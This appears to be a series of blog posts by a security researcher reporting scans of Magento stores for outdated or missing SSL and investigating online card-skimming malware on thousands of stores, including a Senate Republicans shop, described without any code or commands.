Sites accepting passwords or credit cards without SSL will show a warning
Other browsers such as Firefox have also announced stricter SSL handling.
Old SHA1 SSL certificates
Old SSL certificates use SHA1 hashing, which is considered insecure. New certificates use SHA256 or even SHA512. The quest to eliminate insecure SSL certificates has been going on for a few years. Browsers have displayed incrementally intrusive warnings. The latest Chrome warning is a red mark in your address bar:
But from January onwards, Chrome 56 will actually block you from visiting the site.
Half a year ago I wrote that 37.000 Magento sites were using insecure SSL certificates. Now, that was an awful lot. The good news is that certificates have to be renewed periodically, and SSL providers have not handed out insecure certs since 2016.
So what is the verdict today? I have reran my scan of all 305K known Magento stores globally and detected .. only 432 stores with outdated SSL! These stores have an old insecure certificate with multi-year validity (beyond 2016) and their owners probably forgot about them.
To summarize, less than 0.2% of Magento stores will break once Google releases Chrome 56. I think that is an amazing result.
No SSL at all
Until now, Chrome showed a small exclamation mark for non-SSL stores. Chrome 56 will show a slightly bigger warning:
While this isn’t exactly terrifying yet, it will hopefully encourage a couple more store owners to go SSL-only. Because that isn’t quite commonplace: out of 305.000 Magento stores, only 31.000 (<11%) enforce SSL site-wide.
In June 2017 I will run a new scan. How many Magento sites will be HTTPS only by then? Place your bet in the comments below.
Data came from public sources such as builtwith.com, DNS zones and site frontpages.
The list I published at Oct 11th, was accurate as of Oct 10th.
I have published an updated list as of Oct 12th (also taken offline by Github) that showed that 332 shops had in fact fixed their site since my publication. It also showed that 170 new shops had been compromised.
I wrote about this in 2015. The problem is not solved today, in fact it has nearly doubled.
I have told and stressed to any journalist that the problem is not with a particular type of store software, but due to sloppy maintenance.
I have contacted about 30 merchants directly. I got either no response, or “thanks but we are safe” even though I pointed out the specific malware code on their frontpage.
I have, prior to publication, submitted all URLs and malware samples to Google’s Safe Browsing team. They have since only acted upon a small portion of the sites.
I understand that Github doesn’t have the resources to investigate each and every DMCA notice. However, it still took me by surprise that Github censors data so easily.
So I am happy to have moved my data to Gitlab (co-founded by an amazing Dutch guy) today.
I understand that if you are a merchant, it is not a pleasure to be on that list. I absolutely agree that publishing a list of compromised stores is a tough measure. However, I think this is better than letting the problem fester (as it has been since 2015). If you have cleaned your store, send me an email (preferably with a Magereport screenshot) and I’d be happy to remove you.
So far, between Oct 10 and Oct 14, 631 stores have been fixed. Great work everybody!
Last week I showed how the Senate Republicans were skimmed for 6 months (and then it was quietly fixed). But this is just one example of thousands of stores that have been compromised and are still being skimmed.
How it works
Online skimming is just like physical skimming: your card details are stolen so that other people can spend your money. However, online skimming is more effective because a) it is harder to detect and b) it is near impossible to trace the thieves.
Online skimming gains popularity
Online skimming is a new form of card fraud. In November 2015, the first case was reported. Upon investigating, I scanned a sample of 255K online stores globally and found 3501 stores to be skimmed. It is now ten months later. Are the culprits in jail yet? Not quite, here are the numbers of compromised stores:
Victims vary from car makers (Audi ZA) to government (NRSC, Malaysia) to fashion (Converse, Heels.com), to pop stars (Bjork) to NGOs (Science Museum, Washington Cathedral).
754 stores who are skimming today, were already skimming in 2015. Apparently you can skim cards undisturbed for months.
Update Oct 14: 631 stores have been fixed, good work everybody!
Culprits get professional
In 2015, reported malware cases were all minor variations of the same code base. In March 2016, another malware variety was discovered (report in Dutch). Today, at least 9 varieties and 3 distinct malware families can be identified (see my collection of samples). This suggests that multiple persons or groups are involved.
To trick the casual observer, the malware has sometimes been disguised as UPS code:
Another sign of malware sophistication is the maturity of the payment detection algorithm. The first malware just intercepted pages that had checkout in the URL. Newer versions also check for popular payment plugins such as Firecheckout, Onestepcheckout and Paypal.
Replies from worried merchants
I have manually reported several compromised shops and got some curious responses:
We don’t care, our payments are handled by a 3rd party payment provider
Or, even better:
Our shop is safe because we use https
New cases could be stopped right away if store owners would upgrade their software regularly. But this is costly and most merchants don’t bother.
Besides, that would not repair the current hausse of abuse. While stores could be contacted on an individual basis, it is a lot of work and nobody does it. Companies such as Visa or Mastercard could revoke the payment license of sloppy merchants. But it would be way more efficient if Google would add the compromised sites to its Chrome Safe Browsing blacklist. Visitors would be greeted with a fat red warning screen and induce the store owner to quickly resolve the situation. I have submitted all my malware samples to Google’s Safe Browsing team but only a small part of the detected malware has been blocked so far.
Did you order anything from the Senate Republicans in the last half year? In that case, your name and credit card details have been skimmed and sent to a Russian server. And subsequently sold on the dark web for $30.
Update Oct 6th: The Republicans have rushed to secure their store today. But no word about the skimming between March 16th and October 5th.
See a short video where I demonstrate how the skimming works. And read on to find out how I traced the culprits to a hornet’s nest of criminal activity.
I think I’ll pass on the Never Hillary sticker for now.
The crime scene
So our evidence consists of one compromised Republican store, which was fitted with hidden skimming software at least 6 months ago (dissection of the malware here). And we have two Russian credit card harvesters with the rather boring names jquery-cloud.net (March) and jquery-code.su (October).
Both domain names are hosted by a company called Dataflow, as is shown by the nameservers and IP addresses. Curiously, the Dataflow network and the jquery-cloud.net domain name were created in the same week:
I do not know how many credit cards were stolen from the Republican store but I can make an educated guess. According to TrafficEstimates, the Republican store has received some 350K visits per month lately. A conservative conversion ratio of 1% yields 3500 stolen credit cards per month, or 21K stolen credits cards since March. Black market value per card is between $4 and $120, so I assume a modest $30 per card. The villains could have made roughly $600K on this store alone.
Note, this is just the criminal yield. The monetary loss for society is higher, as credit card companies reimburse their clients for fraudulent deductions (actual deductions are much higher than the black market value!) and conduct investigations. They shift these fraud handling costs to their clients, so that merchants pay a higher transaction fee and, in turn, shift this to their customer (you).
This clever form of card skimming has been going for a while, at least since March. The culprits are hiding behind an shelf company in Belize. Their business is growing rapidly, which I will illustrate in a next post.